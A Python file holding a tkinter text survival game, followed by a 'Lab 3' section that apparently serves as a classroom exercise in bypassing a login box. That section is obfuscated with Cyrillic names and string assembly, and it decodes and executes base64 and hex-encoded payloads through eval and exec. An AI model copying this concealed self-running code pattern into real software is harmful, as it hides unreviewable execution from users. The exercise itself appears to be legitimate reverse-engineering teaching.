from tkinter import *
from tkinter import ttk
# Class that initiates data for use in the GUI class
class Game:
# Function that initializes variables with data
def __init__(self):
# EDIT VARIABLES BELOW #########################################################################################
# List of commands - Gets displayed in the "Help" menu
self.commands = {
"i": "see inventory",
"c": "see crafting options",
"h": "see help",
"q": "see quests",
"craft [item] [amount]": "craft something from inventory items",
"eat [item]": "Eat something from inventory to restore hunger",
"gather [item]": "Increase resources in your inventory"
}
# an inventory of items - Gets listed in the "Inventory" menu
# Edit the number values to change your starting amount
self.items = {
"flint": 50,
"grass": 100,
"hay": 0,
"tree": 100,
"log": 0,
"sapling": 100,
"twig": 0,
"boulder": 30,
"rock": 0,
"pickaxe": 0,
"axe": 0,
"firepit": 0,
"tent": 0,
"torch": 0,
}
# List of Gatherable items
# Add items from the items list below to be able to gather different items
self.gatherable = [
"flint",
"grass",
"tree",
"sapling",
"boulder",
]
# Inventory of Food items
# Edit the "amount" numbers to change how much you start with.
# Edit the "restores" number to change how much each food restores hunger by.
self.foods = {
"potato": {
"amount": 10,
"restores": 5
},
"bread": {
"amount": 5,
"restores": 10
},
"apple": {
"amount": 20,
"restores": 2
},
"porkchop": {
"amount": 5,
"restores": 20
}
}
# rules to make new objects
# Change the number values to change how much resources required to craft the item
self.craft = {
"hay": {"grass": 1},
"twig": {"sapling": 1},
"log": {"axe": 1, "tree": 1},
"axe": {"twig": 3, "flint": 1},
"tent": {"twig": 10, "hay": 15},
"firepit": {"boulder": 5, "log": 3, "twig": 1, "torch": 1},
"torch": {"flint": 1, "grass": 1, "twig": 1},
"pickaxe": {"flint": 2, "twig": 1}
}
# List of Quests
# Add more quests by adding a new entry under here
self.quests = [
"Craft a Hay",
"Craft a Tent",
"Craft a Firepit",
]
# Hero Statistics
# Change the hunger value to change how much hunger you start with
# Change the hungerDecay value to change how quickly or slowly the hunger goes down by
# Change the health value to change how much health you start with
# Change the healthDecay value to change how quickly or slowly your health goes down by or regenerates by
# Change the gatherRate value to change how much resources you get when using the gather command
self.hero = {
"hunger": 100,
"hungerDecay": 5,
"health": 20,
"healthDecay": 2,
"gatherRate": 2,
}
########################################################################################################################
# End Recommended Editable Area #
########################################################################################################################
# Class that draws the GUI and runs the game logic and functions
class Gui:
argument = ""
history = []
index = -1
qtimes = 0
itimes = 0
ctimes = 0
htimes = 0
game = Game()
g = Game() # Reference variable
def __init__(self, master):
# Window itself
self.master = master
master.title("Python Game")
master.geometry("960x480")
master.resizable(False, False)
master.configure(background='black')
# Health and Hunger bar themes
self.s = ttk.Style()
self.s.theme_use('clam')
self.s.configure("red.Horizontal.TProgressbar", foreground="red", background="red")
self.s.configure("green.Horizontal.TProgressbar", foreground="green", background="green")
self.s.configure("yellow.Horizontal.TProgressbar", foreground="yellow", background="yellow")
self.s.configure("brown.Horizontal.TProgressbar", foreground="brown", background="brown")
# Title Label
self.title = Label(master, text="Generic Survival Game", bg="black", fg="white", font=("Impact", 48))
self.title.place(x=180, y=13)
# Subtitle Label
self.subtitle = Label(master, text="Written entirely in Python", bg="black", fg="white", font=("Georgia", 16))
self.subtitle.place(x=350, y=90)
# Another Label below the Subtitle
self.instruction = Label(master, text="Survive the Night!", bg="black", fg="white", font=("Georgia", 24))
self.instruction.place(x=340, y=200)
# Button that starts or restarts the game
self.start = Button(master, text="Start", command=self.startgame, font=("Impact", 28))
self.start.place(x=230, y=350, width=200, height=100)
# Button that quits the game
self.quit = Button(master, text="Quit", command=quit, font=("Impact", 28))
self.quit.place(x=530, y=350, width=200, height=100)
# Label telling where to put command
self.command = Label(master, text="Enter Your Command:", bg="black", fg='white')
self.command.configure(highlightbackground='white')
# Top divider between user entry and rest of game
self.div = Label(master, text="", bg="white")
# Divider between Label and User entry box
self.div2 = Label(master, text="", bg="white")
# Where the user types their arguments
self.userCommand = Entry(master, bg="black", fg="white", font=("Georgia", 14), borderwidth=0)
# Output box that gives user more info
self.outbox = Text(master, wrap="word", state="disabled", font=("Georgia", 12))
# Quests "button"
self.quests = Label(master, text="[Q]uests", bg="black", fg="white", borderwidth=2, relief="groove")
# Inventory "button"
self.inventory = Label(master, text="[I]nventory", bg="black", fg="white", borderwidth=2, relief="groove")
# Crafting "button"
self.crafting = Label(master, text="[C]rafting", bg="black", fg="white", borderwidth=2, relief="groove")
# Help "Button"
self.help = Label(master, text="[H]elp", bg="black", fg="white", borderwidth=2, relief="groove")
# Boxes
self.questbox = Text(master, wrap="word", state="disabled", font=("Georgia", 12))
self.inventorybox = Text(master, wrap="word", state="disabled", font=("Georgia", 12))
self.craftbox = Text(master, wrap="word", state="disabled", font=("Georgia", 12))
self.helpbox = Text(master, wrap="word", state="disabled", font=("Georgia", 12))
# Health display
self.health = Label(master, text=("Health: " + str(Gui.game.hero["health"])), bg="black", fg="white",
font=("Georgia", 16))
# Hunger display
self.hunger = Label(master, text="Hunger: " + str(Gui.game.hero["hunger"]), bg="black", fg="white",
font=("Georgia", 16))
# Popup notificatin
self.popup = Label(master, text="You survived!", bg="black", fg="white", borderwidth=2, relief="groove")
# Health Bar
self.hbar = ttk.Progressbar(master, orient="horizontal", length=200, mode="determinate")
# Hunger Bar
self.hungerbar = ttk.Progressbar(master, orient="horizontal", length=200, mode="determinate")
def startgame(self):
# Get new instance of Game
Gui.game = Game()
# Place UI Elements
self.command.place(x=10, y=448, height=32)
self.div.place(y=447, height=1, width=960)
self.div2.place(y=448, x=140, height=32)
self.userCommand.place(x=150, y=448, height=32, width=820)
self.userCommand.focus()
# Binds key to perform a specific function
self.master.bind('<Return>', self.parse) # Sends data
self.master.bind('<Up>', self.get_history_up) # Gets previous args
self.master.bind('<Down>', self.get_history_down) # Gets previous args
# Places rest of UI
self.outbox.place(y=340, width=960, height=106)
self.quests.place(x=0, y=300, width=240, height=40)
self.inventory.place(x=240, y=300, width=240, height=40)
self.crafting.place(x=480, y=300, width=240, height=40)
self.help.place(x=720, y=300, width=240, height=40)
self.health.place(x=200, y=130)
self.hunger.place(x=200, y=160)
self.hunger.config(text="Hunger: " + str(Gui.game.hero["hunger"]))
self.health.config(text="Health: " + str(Gui.game.hero["health"]))
# Forget buttons and instruction
self.start.place_forget()
self.quit.place_forget()
self.instruction.place_forget()
self.hbar.place(x=340, y=137)
self.hbar.config(style="green.Horizontal.TProgressbar")
self.hbar["value"] = Gui.game.hero["health"]
self.hbar["maximum"] = Gui.game.hero["health"]
self.hungerbar.place(x=340, y=167)
self.hungerbar.config(style="brown.Horizontal.TProgressbar")
self.hungerbar["value"] = Gui.game.hero["hunger"]
self.hungerbar["maximum"] = Gui.game.hero["hunger"]
def endgame(self, endtext):
Gui.argument = ""
Gui.history = []
Gui.index = -1
Gui.qtimes = 0
Gui.itimes = 0
Gui.ctimes = 0
Gui.htimes = 0
Gui.game = Game() # Needed
self.start.config(text="Restart")
self.start.place(x=230, y=350, width=200, height=100)
self.quit.place(x=530, y=350, width=200, height=100)
if endtext == "lose":
self.instruction.config(text="You have Died!")
self.instruction.place(x=370, y=200)
elif endtext == "win":
self.instruction.config(text="You have Survived!")
self.instruction.place(x=330, y=200)
self.command.place_forget()
self.div.place_forget()
self.div2.place_forget()
self.userCommand.place_forget()
self.outbox.config(state="normal")
self.outbox.delete("1.0", END)
self.outbox.config(state="disabled")
self.outbox.place_forget()
self.quests.config(relief="groove", bg="black", fg="white")
self.quests.place_forget()
self.inventory.config(relief="groove", bg="black", fg="white")
self.inventory.place_forget()
self.crafting.config(relief="groove", bg="black", fg="white")
self.crafting.place_forget()
self.help.config(relief="groove", bg="black", fg="white")
self.help.place_forget()
self.health.place_forget()
self.hunger.place_forget()
self.inventorybox.place_forget()
self.questbox.place_forget()
self.helpbox.place_forget()
self.craftbox.place_forget()
self.hungerbar.place_forget()
self.hbar.place_forget()
# Gets the text inputted by the user and parses accordingly
def parse(self, event):
keypress = event # Stores data about keypress, not necessary
Gui.index = -1
Gui.argument = self.userCommand.get()
self.userCommand.delete(0, 'end')
if Gui.argument is not "" and Gui.argument is not " ":
Gui.history.insert(0, Gui.argument)
if len(Gui.history) > 100:
try:
Gui.history.remove(-1)
except ValueError:
pass
Gui.argument = Gui.argument.strip().lower() # Normalizes input
if "craft" in Gui.argument and len(Gui.argument.split(" ")) > 1:
Gui.craft(self, Gui.argument) # Runs rest of game logic
elif "eat " in Gui.argument:
tokens = Gui.argument.split(" ")
self.write_to_outbox("Eating " + tokens[1])
Gui.eat(self, tokens[1])
elif "gather " in Gui.argument:
tokens = Gui.argument.split(" ")
self.write_to_outbox("Gathering " + tokens[1])
Gui.gather(self, tokens[1])
elif "quests" in Gui.argument or "q" in Gui.argument and len(Gui.argument) == 1:
Gui.qtimes += 1
if Gui.qtimes is 1:
self.quests.config(relief="sunken", bg="white", fg="black")
self.questbox.config(state="normal")
self.questbox.delete("1.0", END)
a = get_everything(Gui.game.quests) # Different way to do it
self.questbox.insert(INSERT, a)
self.questbox.place(x=0, y=210, height=100, width=240)
self.questbox.config(state="disabled")
# Output Box
self.write_to_outbox("Opened Quests menu")
else:
Gui.qtimes = 0
self.quests.config(relief="groove", bg="black", fg="white")
self.questbox.place_forget()
# Output Box
self.write_to_outbox("Closed Quests menu")
elif "inventory" in Gui.argument or "i" in Gui.argument and len(Gui.argument) == 1:
Gui.itimes += 1
if Gui.itimes is 1:
self.inventory.config(relief="sunken", bg="white", fg="black")
self.inventorybox.config(state="normal")
self.inventorybox.delete("1.0", END)
self.inventorybox.insert(INSERT, get_everything(Gui.game.items))
self.inventorybox.place(x=240, y=210, height=100, width=240)
self.inventorybox.config(state="disabled")
self.write_to_outbox("Opened Inventory menu")
else:
Gui.itimes = 0
self.inventory.config(relief="groove", bg="black", fg="white")
self.inventorybox.place_forget()
self.write_to_outbox("Closed Inventory menu")
elif "crafting" == Gui.argument or "c" in Gui.argument and len(Gui.argument) == 1:
Gui.ctimes += 1
if Gui.ctimes is 1:
self.crafting.config(relief="sunken", bg="white", fg="black")
self.craftbox.config(state="normal")
self.craftbox.delete("1.0", END)
self.craftbox.insert(INSERT, get_everything(Gui.game.craft))
self.craftbox.place(x=480, y=210, height=100, width=240)
self.craftbox.config(state="disabled")
self.write_to_outbox("Opened Crafting menu")
else:
Gui.ctimes = 0
self.crafting.config(relief="groove", bg="black", fg="white")
self.craftbox.place_forget()
self.write_to_outbox("Closed Crafting menu")
elif "help" in Gui.argument or "h" in Gui.argument and len(Gui.argument) == 1:
Gui.htimes += 1
if Gui.htimes is 1:
self.help.config(relief="sunken", bg="white", fg="black")
self.helpbox.config(state="normal")
self.helpbox.delete("1.0", END)
self.helpbox.insert(INSERT, get_everything(Gui.game.commands))
self.helpbox.place(x=720, y=210, height=100, width=240)
self.helpbox.config(state="disabled")
self.write_to_outbox("Opened Help menu")
else:
Gui.htimes = 0
self.help.config(relief="groove", bg="black", fg="white")
self.helpbox.place_forget()
self.write_to_outbox("Closed Help menu")
else:
self.write_to_outbox(Gui.argument + " is not a valid argument")
# if the command is not blank
if Gui.argument is not "" and Gui.argument is not " ":
# Hunger and Health
# If hunger is greather than 70% of max
if Gui.game.hero["hunger"] >= int(Gui.g.hero["hunger"] * 0.7):
# If health is lower than maximum
if Gui.game.hero["health"] < Gui.g.hero["health"]:
# Regeneration of health
Gui.game.hero["health"] += Gui.game.hero["healthDecay"]
# If health is greater than maximum
if Gui.game.hero["health"] > Gui.g.hero["health"]:
# Set health to maximum
Gui.game.hero["health"] = Gui.g.hero["health"]
if Gui.game.hero["hunger"] > 0 and "eat" not in Gui.argument.lower():
Gui.game.hero["hunger"] -= Gui.game.hero["hungerDecay"]
if Gui.game.hero["hunger"] < 0:
Gui.game.hero["hunger"] = 0
if Gui.game.hero["hunger"] == 0 and "eat" not in Gui.argument.lower():
if Gui.game.hero["health"] != 0:
Gui.game.hero["health"] -= Gui.game.hero["healthDecay"]
if Gui.game.hero["health"] < 0:
Gui.game.hero["health"] = 0
if Gui.game.hero["health"] == 0:
self.endgame("lose")
self.hbar["value"] = Gui.game.hero["health"]
self.hungerbar["value"] = Gui.game.hero["hunger"]
self.hunger.config(text="Hunger: " + str(Gui.game.hero["hunger"]))
self.health.config(text="Health: " + str(Gui.game.hero["health"]))
if Gui.game.hero["health"] > int(Gui.g.hero["health"] * 0.5):
self.hbar.configure(style="green.Horizontal.TProgressbar")
elif Gui.game.hero["health"] > int(Gui.g.hero["health"] * 0.25):
self.hbar.configure(style="yellow.Horizontal.TProgressbar")
else:
self.hbar.configure(style="red.Horizontal.TProgressbar")
# Function that "returns" previous commands
def get_history_up(self, event):
keypress = event
amt = len(Gui.history)
if amt > 0:
Gui.index += 1
if Gui.index < amt:
self.userCommand.delete(0, 'end')
self.userCommand.insert(0, Gui.history[Gui.index])
else:
Gui.index = amt-1
self.userCommand.delete(0, 'end')
self.userCommand.insert(0, Gui.history[Gui.index])
# Function that "returns" previous commands (backwards)
def get_history_down(self, event):
keypress = event
if len(Gui.history) > 0:
Gui.index -= 1
if Gui.index >= 0:
self.userCommand.delete(0, 'end')
self.userCommand.insert(0, Gui.history[Gui.index])
if Gui.index <= -1:
Gui.index = -1
self.userCommand.delete(0, 'end')
def write_to_outbox(self, text):
text = text + "\n"
self.outbox.config(state="normal")
self.outbox.insert(END, text)
self.outbox.config(state="disabled")
self.outbox.see(tkinter.END)
def eat(self, item):
if item in Gui.game.foods.keys() and Gui.game.foods[item]["amount"] > 0:
self.write_to_outbox("Restored " + str(Gui.game.foods[item]["restores"]) + " hunger")
if Gui.game.hero["hunger"] != 100:
Gui.game.hero["hunger"] += Gui.game.foods[item]["restores"]
if Gui.game.hero["hunger"] > 100:
Gui.game.hero["hunger"] = 100
self.hunger.config(text="Hunger: " + str(Gui.game.hero["hunger"]))
Gui.game.foods[item]["amount"] -= 1
self.inventorybox.config(state="normal")
self.inventorybox.delete("1.0", END)
self.inventorybox.insert(INSERT, get_everything(Gui.game.items))
self.inventorybox.config(state="disabled")
else:
self.write_to_outbox(item + " is not an edible item")
if Gui.game.hero["hunger"] > 0:
Gui.game.hero["hunger"] -= Gui.game.hero["hungerDecay"]
if Gui.game.hero["hunger"] < 0:
Gui.game.hero["hunger"] = 0
self.hunger.config(text="Hunger: " + str(Gui.game.hero["hunger"]))
if Gui.game.hero["hunger"] == 0:
if Gui.game.hero["health"] != 0:
Gui.game.hero["health"] -= Gui.game.hero["healthDecay"]
if Gui.game.hero["health"] <= 0:
self.endgame("lose")
else:
self.endgame("lose")
self.hungerbar["value"] = Gui.game.hero["hunger"]
def gather(self, item):
if item in Gui.game.gatherable:
self.write_to_outbox("Gathered " + str(Gui.game.hero["gatherRate"]) + " " + item)
Gui.game.items[item] += Gui.game.hero["gatherRate"]
self.inventorybox.config(state="normal")
self.inventorybox.delete("1.0", END)
self.inventorybox.insert(INSERT, get_everything(Gui.game.items))
self.inventorybox.config(state="disabled")
elif item in Gui.game.foods:
self.write_to_outbox("Gathered " + item)
Gui.game.foods[item]["amount"] += Gui.game.hero["gatherRate"]
self.inventorybox.config(state="normal")
self.inventorybox.delete("1.0", END)
self.inventorybox.insert(INSERT, get_everything(Gui.game.items))
self.inventorybox.config(state="disabled")
else:
self.write_to_outbox(item + " is not gatherable")
# Method for Crafting items
def craft(self, arg):
command = arg.split(" ")
if len(command) > 1:
item = command[1].lower()
else:
Gui.write_to_outbox(self, "Error: No item specified.")
return
# If a quantity is defined, try to extract it
if len(command) > 2:
try:
quantity = int(command[2].lower())
except ValueError:
Gui.write_to_outbox(self, "Error: Please switch position of item and quantity")
return
else:
quantity = 1
Gui.write_to_outbox(self, "Crafting " + item + ":")
if item in Gui.game.craft:
# Print item requirements and check if all items are present
for i in Gui.game.craft[item]:
Gui.write_to_outbox(self, f"{item} requires: {str(Gui.game.craft[item][i] * quantity)} {i}. You have: {str(Gui.game.items[i])}")
if (Gui.game.craft[item][i] * quantity) > Gui.game.items[i]:
Gui.write_to_outbox(self, "Item cannot be crafted.")
return
# Remove the items from the inventory
for i in Gui.game.craft[item]:
Gui.game.items[i] -= Gui.game.craft[item][i] * quantity
# Add the new item
Gui.game.items[item] += 1 * quantity
Gui.remove_quest(self, item)
Gui.write_to_outbox(self, f"{item} crafted.\n")
self.inventorybox.config(state="normal")
self.inventorybox.delete("1.0", END)
self.inventorybox.insert(INSERT, get_everything(Gui.game.items))
self.inventorybox.config(state="disabled")
if len(Gui.game.quests) == 0:
Gui.write_to_outbox(self, "\n**YOU HAVE MANAGED TO SURVIVE!\nWELL DONE!")
self.endgame("win")
else:
Gui.write_to_outbox(self, "Error: That item does not exist in the crafting table.")
def remove_quest(self, arg):
arg = arg.capitalize()
# for i in range(len(Gui.game.quests)):
for item in Gui.game.quests[:]:
if arg in item:
try:
Gui.game.quests.remove(item)
except ValueError:
pass
self.questbox.config(state="normal")
self.questbox.delete("1.0", END)
a = get_everything(Gui.game.quests) # Different way to do it
self.questbox.insert(INSERT, a)
self.questbox.config(state="disabled")
def get_everything(objects):
if objects is Gui.game.quests:
quest_string = ""
for i in range(len(objects)):
quest_string += objects[i] + "\n"
return quest_string
elif objects is Gui.game.craft:
recipe_strings = ""
for key in objects:
recipe_strings += key + " can be made with:\n"
for i in Gui.game.craft[key]:
recipe_strings += str(Gui.game.craft[key][i]) + " " + i + "\n"
recipe_strings += "\n"
return recipe_strings
elif objects is Gui.game.items:
item_strings = ""
for key in objects:
item_strings += key + "\t: " + str(objects[key]) + "\n"
for key in Gui.game.foods:
item_strings += key + "\t: " + str(Gui.game.foods[key]["amount"]) + "\n"
return item_strings
else:
object_strings = ""
for key in objects:
object_strings += key + " : " + str(objects[key]) + "\n"
return object_strings
########################################################################################################################
# END LAB 2 ############################################################################################################
########################################################################################################################
########################################################################################################################
# START LAB 3 ##########################################################################################################
########################################################################################################################
"""
Warning: Do not alter anything below until instructed to do so.
Instructions: Attempt to bypass or disable the login box
Remember: Undo [CTRL]+[Z] is your friend
"""
def qeydfsfgdstreygfd(hytedy, ghytjh, fewqe):
return hytedy + ghytjh + fewqe
from base64 import b64decode as безопасность
pdftagrthrsae = "ianm_girstn<8ab6>_u-ecxmeaoplvfybh."
лояльность = qeydfsfgdstreygfd(pdftagrthrsae[4],pdftagrthrsae[17],pdftagrthrsae[3])+"ai"+qeydfsfgdstreygfd(pdftagrthrsae[2],pdftagrthrsae[17],"_")
Кремль = qeydfsfgdstreygfd(pdftagrthrsae[11],pdftagrthrsae[8],pdftagrthrsae[9])+qeydfsfgdstreygfd(pdftagrthrsae[7]+"i",pdftagrthrsae[10],pdftagrthrsae[5]+">")
технологии = qeydfsfgdstreygfd(pdftagrthrsae[20],"",pdftagrthrsae[29])
компьютер = qeydfsfgdstreygfd("",pdftagrthrsae[1],pdftagrthrsae[28])
кодирование = qeydfsfgdstreygfd(технологии,"",компьютер)
нарушения = eval(compile(qeydfsfgdstreygfd("c",pdftagrthrsae[26]+"m",pdftagrthrsae[27]+"i")+qeydfsfgdstreygfd(pdftagrthrsae[28],pdftagrthrsae[20],""), Кремль, кодирование))
оценивать = eval(compile(кодирование, Кремль, кодирование))
сила = qeydfsfgdstreygfd(pdftagrthrsae[32]+"y","t",pdftagrthrsae[20]+pdftagrthrsae[8]+".")
информационная = оценивать(нарушения(сила+qeydfsfgdstreygfd(pdftagrthrsae[-5]+"ro","m",pdftagrthrsae[-2]+pdftagrthrsae[20])+pdftagrthrsae[22], Кремль, кодирование))
большевик = pdftagrthrsae[18]+pdftagrthrsae[9]+qeydfsfgdstreygfd(pdftagrthrsae[30],pdftagrthrsae[19],pdftagrthrsae[12])
взлом = оценивать(нарушения(qeydfsfgdstreygfd(pdftagrthrsae[(9-1)],pdftagrthrsae[(27-9*(2-(-2)))*-1],pdftagrthrsae[int((2/(1/4))-1)]), Кремль, кодирование))
советский = qeydfsfgdstreygfd(pdftagrthrsae[20],pdftagrthrsae[22],pdftagrthrsae[(17+3)])+pdftagrthrsae[(7*3)]
выигрыш = оценивать(нарушения(pdftagrthrsae[4]+qeydfsfgdstreygfd("_"+pdftagrthrsae[2]+pdftagrthrsae[1],pdftagrthrsae[3]+pdftagrthrsae[20],pdftagrthrsae[17]+pdftagrthrsae[4]), Кремль, кодирование))
"""
So you want to know what goes on below?
The first step is to decode the message in tow.
There are many unnecessary marks under the score
But only one aligns different than the rest.
Once you find the correct mark,
Move not more than two forward and not more than three backward,
For these nefarious characters
Are plotting against you.
Fuse all the pieces together
And you will find a secret message,
Cast in base64
A firey tool will help
Lead the way
<KEY>
"""
if выигрыш == лояльность:
оценивать(нарушения(взлом(безопасность(
'<KEY>'
'<KEY>'
'<KEY>'
'<KEY>'
'<KEY>'
'c='),
большевик),
Кремль,
советский)
)
оценивать(
информационная(
'6C316C316C316C31280D0A096C6C316C31316C31280D0A09096C31316C6C316C31280D0A0909096D6C737734746A37363377303968'
'6773280D0A0909090927624446734D5777786244456F62444578624778736247776F44516F4A4A7A5A444D7A4532517A4D784E6B4D'
'7A4D545A444D7A45794F445A444E6B4D7A4D545A444D7A457A4D545A444D7A45794F445A444D7A457A4D545A444E6B4D7A4D545A44'
'4D7A270D0A090909092745794F445A454E6B4D334D7A63334D7A51334E445A424D7A637A4E6A4D7A4E7A637A4D444D354E6A67324E'
'7A637A4D6A6777524442424D446B794E7A56424D7A497A4F545A454E6A49304F4452464A77304B43536332516A59794E6B51324F44'
'6378270D0A09090909274E446B304E444D774E6A63324D6A51304E4459334D7A59794E4451304E5463344E6A49304E4451314E6B59'
'324D6A55334E7A6733515459304E3045314D6A4D774E6A45325154597A4D7A493052444D7A4E6A4D334E7A52474E5463324F445A46'
'4E6A270D0A09090909274D334F5459334E6A6B314F5464424E4555314E7A59314E5463314D6A63304E6A49304E43634E43676B6E4E'
'454531515455324D7A4D324E444D784E546B7A4D4459344E7A49314D44557A4E446B334D4452444E444D304D6A5A444E6A49325244'
'5246270D0A09090909274E7A5931515451334E6B4D334E5456424E30457A4D545A434E5463304E6A52424E7A51314E4451324E5449'
'32525452434E544D7A4E5463354E5545314E7A51324E6B49324D6A51334D6A6377524442424D446B794E7A5A444E7A556E44516F4A'
'4A7A270D0A090909092756424E54673052445A474E4549314D544D774E4549324E444D794E4551324E7A55774E544D304D5459354E'
'446B324E7A4D774E4549314F5463354E44457A4F5451354E4451304D5452464E444D32524456424E7A59324D7A59354E4449334E7A'
'597A270D0A09090909274E4467304E6A4D7A4E5545314F4452424E7A41304F5451334E6B4D334E5451354E4463324E4463324E5545'
'32524463344A77304B43536333515456424E44637A4E545A474E6A453251545A474E4555304D7A59334E6B4D334D4456424E6A6B30'
'4D6A270D0A090909092759344E54597A4D545A444E6B55314E7A51304E44557A4E5459304E545932517A55794E446B304E7A5A444E'
'7A55304F5451344E4449334E7A597A4E5467324E445A444E6A4D3252445A434D7A59304E4455784E6B59305154517A4E5463305244'
'5933270D0A09090909274D6A63775243634E43676B6E4D4545774F5449334E45493351544D774E6A6330524455784D7A4130516A51'
'7A4E546332517A5A454E446B304E7A52454E6A63314D4459354E4445334E7A52474E6A637A4D4452434E444D314D545A444D7A4D31'
'4F54270D0A090909092763354E44457A4F5451354E4467324E445A424E446B304D7A637A4E6A63324D7A51344E4449334F4459304D'
'7A49314E6A63354E6A45314D7A4D314E30456E44516F4A4A7A59304E446730515463774E6A4D304D7A59334E7A41304E4455784E7A'
'4133270D0A09090909274D4456424E6A6B304D6A5A424E446B304E4463334E6A6330524455304E6B59305254517A4E6A6332516A52'
'424E6A49304E4451314E7A6730524455334E7A67334D7A52454E5463334E7A5A474E6A49304E4451314E7A67324D6A51334E7A6333'
'4F44270D0A090909092759794E4451304E545A474E6A49314E7A63344A77304B43536333515459304E3045794E7A42454D4545774F'
'5449334E54497A4D4459784E6B45324D7A4D794E45517A4D7A597A4E7A6330526A55334E6A67325254597A4E7A6B324E7A5A464E54'
'5932270D0A0909090927516A59304E6B59324D6A51314E6B4D304E7A56424E4463324F445A424E6A49314E6A52424E7A4D314F545A'
'454E6B4D304D7A59784D7A45334D4455354E545532524463344E5545305243634E43676B6E4D7A45305154637A4E546332516A5246'
'4E44270D0A09090909274D324D5451334E4545334D4455784E6B55304D6A59354E6A4932517A52424D7A5531515451324E6A51314D'
'7A59794E446330525463774E5449314E7A59304E5459314D6A4D774E55457A4E6A55354E304530515451334E6A4932517A63774E54'
'5131270D0A09090909274D545A454D7A6B31515455334E44557A4D545A464E5463314E7A4D784E54636E44516F4A4A7A59794E4463'
'30515463774E54453252445A444E6A6B794E7A42454D4545774F5449334E54493351545A444E7A45314F5455304E4545314E7A5978'
'4D7A270D0A090909092741334F4463774E5445314E544D314E445131515464424E444930517A55314E6B4D324F445A474E6A4D304E'
'7A55794E4467324D6A51344E5459324D5459314E5451314D6A4D784E5451304E7A597A4E7A63314D7A63354A77304B435363324D7A'
'6377270D0A09090909274E454D304D7A51794E6B49314E7A51324E4545334E4455304E4459314D6A5A464E4549314D7A5A434E4555'
'304D7A59334E6B4930515459794E4451304E6A637A4E4551314E7A63334E7A67324D6A51304E445532526A59794E4463334E7A6334'
'4E6A270D0A090909092749304E4451314E7A67324D6A51304E445532526A59794E4451304E5463344E6A49304E7A63334E7A67324D'
'69634E43676B6E4E4451304E545A474E6A49314E7A63344E3045324E4464424E54497A4D4459784E6B45794E7A42454D4545774F54'
'4933270D0A09090909274E6A4D7A4D6A52454D7A4D324D7A63334E4559314E7A59344E6B55324D7A63354E6A6332525455354E3045'
'305254637A4E6A5532516A63344E7A51314E6A5A424E5449324F4455334E4459304E6A63324E5451314E5452464E7A49314D44557A'
'4E6A270D0A09090909274D6E44516F4A4A7A63774E454D304D7A51794E6B49314E7A51324E4545334E4455304E4459314D6A5A464E'
'4549314D7A63334E6A63314E5451314E6A6730526A52454E446330525463304E6A49304F4455324E6A45324E545A424E5445334D7A'
'5135270D0A09090909274E4459334D4455354E6A45304E7A63344E5545324E4463354E6B49334D4451304E5445334D445A424E6A45'
'304D7A51784D7A6B304F5451334A77304B435363334E7A63344E6A49304E4451324E7A4D30524455334E7A63334F4452434E446333'
'4E7A270D0A090909092763344E4551314E7A63344E7A4D794E7A42454D4545774F5449334E4551314E7A63334E7A6730516A51334D'
'7A45334D7A597A4D7A4D324D7A4D774E6A51304E7A5A474D7A4D3052545A424E45557A4D7A52454E445132517A5A474E55457A4D7A'
'5245270D0A09090909274E6B593051544D794E4459304F53634E43676B6E4E6A49304E4451794E6A45314E6A4D784E45457A4E6A55'
'334E6B49324E445A434E6A4D314E7A51324E446731515451344E6B4D32516A55794D7A453051544D324E5451304E7A4D314E455932'
'4D6A270D0A09090909274D784E6B4D314E5455794E54637A4F545A434E455132516A4D784D7A45314E7A5A444E6A4D7A4D5459784E'
'6B51304F5463354E545532524463344E454D314D544D794E7A516E44516F4A4A7A63334E5451304E7A4D784E6B59324D6A51334E54'
'5930270D0A09090909274F4455314E6B55304D6A59784E455132517A56424D7A5931515451314E4555325254597A4E444D794E7A42'
'454D4545774F5449334E6A4D334D4452444E444D304D6A5A434E5463304E6A52424E7A51314E4451324E544932525452434E544D32'
'516A270D0A090909092752464E444D3252445A444E6B51304F5451334E7A67334D7A52454A77304B435363314E4451324E7A4D3052'
'4455334E7A67334D7A52434E4463334E7A63344E6A49304E4451324E7A4D324D6A51304E4459334D7A52434E44637A4D54637A4E6A'
'4D7A270D0A09090909274D7A597A4D7A41324E4451334E6B597A4D7A52464E6B453052544D7A4E4551304E445A444E6B593151544D'
'7A4E455132526A52424D7A4931515463774E4559314E5452424E6B45314D7A51314E4545304E69634E43676B6E4E5463314E6A5934'
'4E54270D0A09090909274D324D5451314E7A63334E7A59314E446731515456424E455132516A56424E3045314E4451304E4459314D'
'7A59794E446330515455354E5445314F4456424E6B45794E7A42454D4545774F5449334E544D304E5456424D7A59314E7A5A434E6A'
'5131270D0A09090909274D7A59314E6B4D334D4463314E544D314F4455324E6B49314D6A64424E44597A4D7A52424E7A6B6E44516F'
'4A4A7A5A434E7A4130516A55304E6B59305254517A4E6A6332517A63334E6A497A4D6A55794D7A45324E4451344E45453252445135'
'4E44270D0A0909090927517A4D4459334E6A49304E4451324E7A4D324D6A51304E4455334F4459794E4451304E545A474E6A49304E'
'4451324E7A4D30524455334E7A67334D7A52454E5463334E7A5A474E6A49314E7A63344E3045324E4464424E54497A4D4459784A77'
'304B270D0A0909090927435363325154597A4D7A493052444D7A4E6A4D334E7A52474E5463324F445A464E6A4D334F5459334E6B55'
'3151545A454E6B497A4E5455784E6B5130525451354E544532516A55324E5545314E7A51324E454532526A55304E4451794E7A4245'
'4D45270D0A090909092745774F5449334E44497A4E4459304E6B4D32516A63354E544932525452464E455130524455324E4545334D'
'7A55354E6B4D324F43634E43676B6E4E4449324E445A454E4555304F5455794E6B55334D4459784E54497A4D5452424D7A59314E7A'
'5A45270D0A09090909274D7A5530515459304E5463314D6A51344E4551314F44597A4E6B5530516A557A4E6B49334D4452444E6B55'
'3051545A444E546B314E7A55784E6B5930516A557A4D7A5533515459304E446730515463774E6A4D304D7A59334E7A41304E445578'
'4E6B270D0A09090909275930515459784E54636E44516F4A4A7A55354E6A63324D7A51334D7A6B32516A59304E5467314D6A63354E'
'5545324F5451784E6A67314D44557A4E444932515459784E445132526A52464E444D324E7A5A434E4545324D6A51304E4455334F44'
'5245270D0A09090909274E5463334F44637A4E4551314E7A63334E6B59794E7A42454D4545774F5449334E6A49304E4451314E7A67'
'324D6A51334E7A63334F4459794E4451304E545A474A77304B435363324D6A55334E7A6733515459304E3045314D6A4D774E6A4532'
'5154270D0A0909090927597A4D7A493052444D7A4E6A4D334E7A52474E5463324F445A464E6A4D334F5459334E6B55314E6A5A434E'
'6A5132526A59794E445532517A51334E5545304E7A59344E6B45324D6A55324E4545334D7A55354E6B5132517A517A4E6A457A4D54'
